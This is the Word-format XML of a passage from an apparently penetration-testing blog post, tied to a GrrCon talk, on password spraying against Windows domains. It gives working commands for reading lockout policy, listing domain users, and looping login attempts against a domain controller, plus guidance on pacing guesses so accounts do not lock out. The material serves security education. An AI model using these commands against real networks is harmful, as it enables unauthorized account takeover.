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53C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">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A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.blackhillsinfosec.com/red-blue-purple/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Red + Blue = Purple</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>David Fletcher</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Sally </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Vandeven</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EA803D"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ADVISORY: The techniques and tools referenced within this blog post may be outdated and do not apply to current situations. However, there is still potential for this blog entry to be used as an opportunity to learn and to possibly update or integrate into modern tools and techniques.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">
      <w:pPr>
        <w:spacing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noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4038600" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="https://blackhillsinfosec.com/wp-content/uploads/legacy/J5w_P0zGOON78HgkjPeJJI8xa69qJ7ddsM7fcEyCUp78JN1rVK-2UPyD_FOggATRC-QNCVDJLsym26Y6Z1VqSETL-R-zutkEiNq4N6bJhDGhowXGsccgjb249PUZZGt1BHd03M1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ackhillsinfosec.com/wp-content/uploads/legacy/J5w_P0zGOON78HgkjPeJJI8xa69qJ7ddsM7fcEyCUp78JN1rVK-2UPyD_FOggATRC-QNCVDJLsym26Y6Z1VqSETL-R-zutkEiNq4N6bJhDGhowXGsccgjb249PUZZGt1BHd03M1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428875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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We gave a </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>presentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>GrrCon</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> hacker conference in Grand Rapids, MI on October 6, 2016. The presentation was a dialogue meant to illustrate the friendly banter between a blue-teamer trying to protect a network and a red-teamer trying to attack it.  The topics that were discussed are some of the more prevalent ways BHIS has found to gain access, escalate privilege, and dominate in typical enterprise environments.</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We also talked about some of the things the blue team can do to prepare for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and make the testers job that much harder.  Here is the presentation with some supporting material below including command examples and references regarding the topics discussed during the presentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Password Spraying </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This refers to a password guessing attack on an enterprise.  The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a list of account names </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>either using the command line and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> querying Active Directory or by harvesting usernames from open source intel.  Then a common password is used, say “Autumn2016” and a login is attempted for each username on the list.  Because of account lockout policies this has to be done with care so that the organization’s users do not get locked out of their accounts.  Guess one single password for each user per observation window so you don’t risk locking out accounts.</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How to</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> launch a password spray attack on a domain from the command line.</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lastRenderedPageBreak/>
        <w:t>First check the password policy, which includes the lockout settings.</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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; net accounts /domain</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The example below shows a domain password policy. For a password spray on this network, we would select simple eight character passwords like Fall2016 or Summer16 (users tend to stick to the minimum length) and we would spray one password every ten minutes. The “Lockout observation window” defines how long after the last incorrect password before the bad-password-counter is reset to zero. So after one incorrect password the bad-password-count is one but if we wait for ten minutes, that count gets reset to zero and we can guess again.  This greatly reduces the chances of locking out accounts.  There are some issues though with services accounts that may not be subject to the same lockout rules. Additionally, the bad-password-count does not get replicated between redundant DCs so if the account is authenticating to different DC’s at each login there could be a conflict. So our rule of thumb is one guess per observation window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">
      <w:pPr>
        <w:spacing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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6372225" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://blackhillsinfosec.com/wp-content/uploads/legacy/mPI8nVk9N9a_yJ6Q2phfp2Cw-jTbIs60JalWbf7LQH3kKKVUeEJe5LzU5gILF3cdUFXdy7K8SyheMDwnRiONVkBidRs7HonlqaMo79X8ImyYMZwPB5XDfxUFuKADD4-PhC4rlU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ackhillsinfosec.com/wp-content/uploads/legacy/mPI8nVk9N9a_yJ6Q2phfp2Cw-jTbIs60JalWbf7LQH3kKKVUeEJe5LzU5gILF3cdUFXdy7K8SyheMDwnRiONVkBidRs7HonlqaMo79X8ImyYMZwPB5XDfxUFuKADD4-PhC4rlU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225" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Once you know the password policy you can create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>userlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using either the wmic utility (strip off the first line from the file that gives the column header) or PowerShell. In our experience the PowerShell command is faster but you may not always have access to PowerShell so both are shown below.</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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\&gt; wmic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>useraccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> where (domain='%USERDOMAIN%') get Name &gt; userlist.txt</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; ([</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adsisearcher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>objectCategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=User").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">() | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ForEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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{$_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>properties.samaccountname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>} | Sort | Out-File -Encoding ASCII</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Note: Above is a one line PowerShell command with a space between “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ForEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and “{$”</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Then test each credential with the following FOR loop that mounts the share \\’%LOGONSERVER%’\IPC$ using each username in userlist.txt and the password which you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> placed in the file “pass1.txt”:</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 xml:space="preserve">@FOR /F %n in (userlist.txt) DO @FOR /F %p in (pass1.txt) DO @net use </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%LOGONSERVER%\IPC$ /user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USERDOMAIN%\%n %p 1&gt;NUL 2&gt;&amp;1 &amp;&amp; @echo [*] %n:%p &amp;&amp; </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@net use /delete \\DC1\IPC$ &gt; NUL</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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Script it!</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can also use </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Beau Bullock</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>PowerShell script Invoke-DomainPasswordSpray.ps1.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This script will do it all for you! All you have to do is point it at a user list and give it a password — in this case “Autumn2016”.  If you give a list of passwords as an argument, the script will guess one password for each account per observation window.  Actually, you don’t even have to give it a user list. If you don’t it will generate a list at runtime. Sweet.</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 xml:space="preserve">PS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\&gt; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DomainPasswordSpray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Domain %USERDOMAIN% -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UserList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> userlist.txt </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-Password Autumn2016</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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</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DomainPasswordSpray.ps1 script: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/dafthack/DomainPasswordSpray</w:t>
        </w:r>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
